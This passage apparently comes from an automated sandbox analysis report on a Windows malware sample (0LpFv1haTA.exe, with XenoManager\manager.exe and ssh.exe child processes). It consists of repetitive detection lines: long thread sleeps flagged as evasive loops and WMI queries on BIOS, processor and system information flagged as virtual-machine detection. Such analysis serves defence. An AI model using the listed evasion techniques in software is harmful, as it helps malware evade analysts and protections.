Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598997
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598651
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597933
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597480
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597363
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597124
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 573647
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4962 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4872 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 2411
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4730
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 6624
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 3231
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\0LpFv1haTA.exe TID: 5236 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599762s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599649s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598725s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598625s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598516s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598078s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597969s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597731s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597625s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597516s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597296s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597076s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596969s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596857s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596738s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596624s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596391s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596281s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596062s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595719s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668 Thread sleep count: 2411 > 30
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668 Thread sleep count: 4730 > 30
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598997s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598651s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597933s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597702s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597480s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597363s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597124s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -573647s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\manager.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 8164 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 1576 Thread sleep count: 6624 > 30
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 6196 Thread sleep count: 3231 > 30
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 4072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 5696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 183684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 344684 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599762 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599649 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598725 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597731 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597076 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596857 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596738 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596624 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598997
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598651
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597933
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597480
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597363
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597124
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 573647
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.36.dr Binary or memory string: VMware
